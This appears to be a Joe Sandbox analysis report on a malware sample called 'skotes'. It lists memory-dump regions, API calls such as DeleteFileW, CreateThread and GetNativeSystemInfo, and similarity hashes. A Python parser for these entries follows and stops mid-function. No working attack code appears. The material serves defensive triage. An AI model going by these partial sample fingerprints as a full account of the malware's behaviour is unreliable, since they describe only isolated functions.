                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: Cnd_destroy_in_situ, Mtx_destroy_in_situ
• String ID:
• API String ID: 1432671424-0
• Opcode ID: 5165afbaf2adebc03e9327e575a1b90d13c14f5fe3abc67ced96dbc6c1cddedf
• Instruction ID: 809a7fefe1cc1133f920f7ff0bc8a9e3719500c424ecfdaa53ebd1453f9f8d34
• Opcode Fuzzy Hash: 5165afbaf2adebc03e9327e575a1b90d13c14f5fe3abc67ced96dbc6c1cddedf
• Instruction Fuzzy Hash: AF3128B1904304AFD720EF68D841A5BB7E9EF16310F10467EEA46C3642E771EE548BE5
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b7f6b4d5f4a1e91113e980a24816c83711a93c055960697268c13129d11ac45e
• Instruction ID: b9c957dd05d0a2eb0562181f8f861e5a34ae2bd15ddb665c5c460bd810d3d222
• Opcode Fuzzy Hash: b7f6b4d5f4a1e91113e980a24816c83711a93c055960697268c13129d11ac45e
• Instruction Fuzzy Hash: 2721B6729052086AEB51AB68EC46FBF372BDF41374F10021DF9742B2D1DB709E0596A9
APIs
• DeleteFileW.KERNEL32(006C6A97,?,006C6A97,?,?,?,00000010), ref: 006CB65D
• __dosmaperr.LIBCMT ref: 006CB66E
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: DeleteFile__dosmaperr
• String ID:
• API String ID: 1911827773-0
• Opcode ID: a32e677933e885521f667db97395161538139f258978352556c49c43dfce7bcf
• Instruction ID: 897dd48c4e1cb497142a651d7f38142176011a8830089d1408eed7c80478c666
• Opcode Fuzzy Hash: a32e677933e885521f667db97395161538139f258978352556c49c43dfce7bcf
• Instruction Fuzzy Hash: 8DD0123118620836DA1035B6AC0D967378E8B853747642619B46C956D2EF26C8514455
APIs
• CreateThread.KERNEL32(00000000,00000000,Function_00016C70,00000000,00000000,00000000), ref: 006A6D11
• Sleep.KERNEL32(00007530), ref: 006A6D25
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateSleepThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4202482776-0
                                                                                                                                                                                                                                          • Opcode ID: 149c7f97229be4d49ee75342163900c203296bbbe8270f06cc6c4d3e261a6435
                                                                                                                                                                                                                                          • Instruction ID: 08888eaf5a9369778cfe5f4d3279adbea3ee5562e339a7d7903d14c28e6c5d75
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 149c7f97229be4d49ee75342163900c203296bbbe8270f06cc6c4d3e261a6435
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AED08C307C4314B6F2203320AC0BF66AA129B0BF51F2D188073183F0D0C2E038004B98
APIs
• GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00698524
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: InfoNativeSystem
• String ID:
• API String ID: 1721193555-0
• Opcode ID: 5d67430a216daeb7146668279f8895676c1b16d24510b97bd5e4edbdae438197
• Instruction ID: bf2289457936003f8c680c28ebc6f153e9d91be30c58c806f9828e9abcb28414
• Opcode Fuzzy Hash: 5d67430a216daeb7146668279f8895676c1b16d24510b97bd5e4edbdae438197
• Instruction Fuzzy Hash: 67512571D002189FDF24EB28CD49BEDB77ADF46310F5042A8E809A7781EF359E848B95
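The function entries above (an "APIs" call list, the memory dump the function was lifted from, the associated dump regions, and the Opcode/Instruction IDs and fuzzy hashes used for similarity lookups) repeat in a fixed shape throughout this part of the report, so a triage script can turn them into records and pivot on the hashes or on which dumped region the code lived in. The parser below is an added example and is not part of the Joe Sandbox report or its tooling. It assumes, from the values on this page only, that the dot-separated fields of an .sdmp name carry the base address, a Win32 PAGE_* protection value and a MEM_* region type at fixed positions (0x40 = PAGE_EXECUTE_READWRITE, 0x80 = PAGE_EXECUTE_WRITECOPY, 0x04 = PAGE_READWRITE, 0x01000000 = MEM_IMAGE, which fits "based on PE: true"), and that the "API ID" is built from the CamelCase tokens of the called APIs, sorted, with the "Get" prefix dropped (GetNativeSystemInfo gives InfoNativeSystem; CreateThread plus Sleep would give CreateSleepThread). The sample entry embedded in the script is constructed from the GetNativeSystemInfo entry on this page with two of its associated dumps.

```python
"""Parse Joe Sandbox 'executed function' entries into structured records.

Added example, not Joe Sandbox code. Field positions inside .sdmp names and
the API-ID token rule are assumptions inferred from the entries on this page.
"""
import re

# Constructed sample: the GetNativeSystemInfo entry from this page, shortened
# to two associated dumps.
SAMPLE_ENTRY = """\
APIs
• GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00698524
Memory Dump Source
• Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_690000_skotes.jbxd
Yara matches
Similarity
• API ID: InfoNativeSystem
• String ID:
• API String ID: 1721193555-0
• Opcode ID: 5d67430a216daeb7146668279f8895676c1b16d24510b97bd5e4edbdae438197
• Instruction ID: bf2289457936003f8c680c28ebc6f153e9d91be30c58c806f9828e9abcb28414
• Opcode Fuzzy Hash: 5d67430a216daeb7146668279f8895676c1b16d24510b97bd5e4edbdae438197
• Instruction Fuzzy Hash: 67512571D002189FDF24EB28CD49BEDB77ADF46310F5042A8E809A7781EF359E848B95
"""

# "• Name.MODULE(args), ref: ADDR"  (bullet optional, so stripped text parses too)
API_RE = re.compile(
    r"^[•*-]?\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
# "• Key: value" (value may be empty, e.g. "String ID:")
KV_RE = re.compile(r"^[•*-]?\s*(?P<key>[^:]+):\s*(?P<val>.*)$")

# Assumed meaning of the protection field; values match Win32 PAGE_* constants.
PAGE_PROTECT = {0x04: "PAGE_READWRITE", 0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_IMAGE = 0x01000000  # assumed meaning of the region-type field


def parse_dump_name(name):
    """Split an .sdmp file name; field positions [3]=base, [4]=protect, [6]=type are assumed."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    parts = stem.split(".")
    prot = int(parts[4], 16)
    return {
        "pid": int(parts[0]),
        "base": int(parts[3], 16),
        "protect": PAGE_PROTECT.get(prot, hex(prot)),
        "is_image": int(parts[6], 16) == MEM_IMAGE,
        "raw": name,
    }


def parse_entry(text):
    """Turn one function entry into a dict of APIs, dump regions and ID fields."""
    entry = {"apis": [], "associated": [], "fields": {}}
    for line in text.splitlines():
        line = line.strip()
        m = API_RE.match(line)
        if m:
            entry["apis"].append({"name": m["name"], "module": m["module"],
                                  "args": m["args"].split(","), "ref": int(m["ref"], 16)})
            continue
        m = KV_RE.match(line)
        if not m:
            continue  # section labels such as "APIs" or "Yara matches"
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Source File":
            file_part, rest = val.split(",", 1)
            entry["source"] = parse_dump_name(file_part.strip())
            entry["offset"] = int(re.search(r"Offset:\s*([0-9A-Fa-f]+)", rest).group(1), 16)
            entry["based_on_pe"] = "based on PE: true" in rest
        elif key == "Associated":
            entry["associated"].append(parse_dump_name(val))
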